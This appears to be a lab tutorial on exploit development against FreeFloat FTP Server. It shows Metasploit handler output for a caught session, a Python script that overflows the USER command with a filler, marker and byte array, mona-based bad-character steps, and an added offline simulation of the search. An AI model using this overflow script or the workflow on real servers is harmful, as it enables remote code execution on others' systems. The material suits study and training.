msf6 exploit(multi/handler) > set LHOST 192.168.229.133
LHOST => 192.168.229.133
msf6 exploit(multi/handler) > set LPORT 5001
LPORT => 5001
msf6 exploit(multi/handler) > run
Success!
Closing notes
Because the book only mentions bad characters in passing and never explains how to use Mona for them, I went back and redid the bad-character search for Kali Linux: writing an exploit module for FreeFloat FTP Server (Part 2).
Bad characters in FreeFloat FTP Server
Following the workflow above, I started with the simpler case (a plain EIP overwrite, no SEH involved) and re-found the bad characters from my earlier notes, Kali Linux: writing an exploit module for FreeFloat FTP Server (Part 1).
One point deserves emphasis: when confirming bad characters, the all-A / all-B filler exists only to make the spot you need to locate easy to find in memory. So the `jmp esp` address from the earlier code is replaced by BBBB, and the NOP sled is dropped, so that the byte array starts immediately after the return-address marker.
import socket
# Python 3. Filler up to the return address, then BBBB where `jmp esp` used to be
# (easy to spot in the debugger), then the byte array straight after it, no NOP sled.
buf = b"\x41"*230 + b"\x42"*4
# !mona bytearray -b "\x00\x0a\x0d\x40"  (the already-known bad bytes are left out)
bad = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
buf += bad
data = b"USER " + buf + b"\r\n"   # the overflow is in the USER command argument
s = socket.socket()
s.connect(('192.168.229.135', 21))
s.send(data)
s.close()
For example, the ESP address here is not 0186FC00 but 0186FBF8, because everything after BBBB is the byte array we filled in. Pay close attention to this, otherwise the result mona reports from the comparison may not be correct!
Repeat the above until all bad characters have been found: \x00\x0a\x0d\x40
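The send / dump / compare loop above is mechanical, and the two ways it goes wrong are the ones the text warns about: comparing from the wrong address, and stopping after the first bad byte instead of repeating until the array survives intact. The following is an added example, not the page's code and not mona: it reproduces that loop offline against a constructed stand-in for the server (simulated_server_copy is invented for the example and only models a C-style parser that stops at NUL/CR/LF and rewrites '@'; it is not FreeFloat FTP Server), generates the byte array the way `!mona bytearray -b` does, and finds the first mismatch the way `!mona compare` does.

```python
# Constructed stand-in for the target. It models how a C-style command parser
# could mangle the USER argument; it is NOT FreeFloat FTP Server itself.
def simulated_server_copy(data):
    """Return what the simulated server leaves in memory: the copy stops at
    NUL, CR or LF, and '@' (0x40) is rewritten to '?'."""
    out = bytearray()
    for b in data:
        if b in (0x00, 0x0a, 0x0d):
            break
        out.append(0x3f if b == 0x40 else b)
    return bytes(out)


def make_bytearray(excluded):
    """Same idea as `!mona bytearray -b "..."`: every byte value 0x00-0xff in
    ascending order, minus the ones already known to be bad."""
    return bytes(b for b in range(256) if b not in excluded)


def first_mismatch(sent, observed):
    """Same idea as `!mona compare`: the first sent byte whose copy in memory
    differs or is missing (truncation counts). None means a clean match."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None


def find_bad_chars(target, prefix, max_rounds=256):
    """Repeat send -> dump -> compare, excluding one newly found bad byte per
    round, until the whole array survives. `prefix` is the filler plus the
    4-byte BBBB marker; the comparison must start exactly where the byte
    array begins in memory, not at whatever a register happens to hold."""
    bad = set()
    for _ in range(max_rounds):
        arr = make_bytearray(bad)
        memory = target(prefix + arr)
        observed = memory[len(prefix):]       # skip filler + BBBB before comparing
        b = first_mismatch(arr, observed)
        if b is None:
            return sorted(bad)
        bad.add(b)
    raise RuntimeError("bad-character search did not converge")


if __name__ == "__main__":
    prefix = b"A" * 230 + b"B" * 4
    found = find_bad_chars(simulated_server_copy, prefix)
    print("bad chars:", " ".join("\\x%02x" % b for b in found))
```

Against the real target, `target` is the manual step (send, let the process crash, dump memory from the address right after BBBB); the loop is the same. Note that a single round reports only the first divergence: a terminator such as \x0a hides every byte after it, which is why the search has to be repeated with the newly found byte excluded, and why starting the comparison a few bytes early flags innocent bytes.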